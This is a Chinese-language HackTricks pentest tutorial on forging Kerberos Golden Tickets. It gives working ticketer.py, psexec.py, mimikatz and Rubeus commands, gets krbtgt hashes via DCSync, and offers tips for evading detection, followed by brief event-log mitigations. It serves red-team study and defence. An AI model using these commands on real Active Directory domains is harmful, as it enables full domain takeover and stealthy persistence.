hacktricks/windows-hardening/active-directory-methodology/golden-ticket.md

5.6 KiB
Raw Blame History

金票

从零开始学习AWS黑客技术成为英雄 htARTE (HackTricks AWS红队专家)

支持HackTricks的其他方式

金票

可以使用krbtgt AD账户的NTLM哈希创建任何用户的有效TGT。伪造TGT而不是TGS的优势在于能够访问域中的任何服务(或机器)和被冒充的用户。
此外,krbtgt凭据从不会自动更改

可以从域中任何DC的lsass进程NTDS.dit文件获取 krbtgt账户的NTLM哈希。也可以通过DCsync攻击来获取NTLM可以使用Mimikatz的lsadump::dcsync模块或impacket示例secretsdump.py来执行。通常,无论使用哪种技术,都需要域管理员权限或类似权限

还必须考虑到使用AES Kerberos密钥AES128和AES256伪造票据是可能的,也是更可取的(操作安全性)。

{% code title="来自Linux" %}

python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass
{% endcode %}

{% code title="来自Windows" %}
#mimikatz
kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist #List tickets in memory

# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi

{% endcode %}

一旦你注入了金票,你就可以访问共享文件**(C$)并执行服务和WMI因此你可以使用psexecwmiexec**来获取一个shell看起来你无法通过winrm获取shell

绕过常见检测

检测金票最常见的方法是检查网络上的Kerberos流量。默认情况下Mimikatz 将TGT签名10年这在随后使用它发出的TGS请求中会显得异常。

有效期2021年3月11日 下午12:39:572031年3月9日 下午12:39:572031年3月9日 下午12:39:57

使用/startoffset/endin/renewmax参数来控制开始偏移、持续时间和最大续订次数(所有时间单位都是分钟)。

Get-DomainPolicy | select -expand KerberosPolicy

不幸的是TGT的生命周期不会在4769事件中记录因此你不会在Windows事件日志中找到这些信息。然而你可以关联的是看到4769事件_没有_之前的4768事件**。不可能在没有TGT的情况下请求TGS如果没有记录发出TGT我们可以推断它是离线伪造的。

为了绕过这种检测,检查钻石票据:

{% content-ref url="diamond-ticket.md" %} diamond-ticket.md {% endcontent-ref %}

缓解措施

  • 4624账户登录
  • 4672管理员登录
  • Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List Property

防御者可以采取的其他小技巧是对敏感用户的4769事件发出警报,例如默认的域管理员账户。

关于Golden Ticket的更多信息在ired.team.

从零开始学习AWS黑客攻击直到成为专家通过 htARTE (HackTricks AWS红队专家)

支持HackTricks的其他方式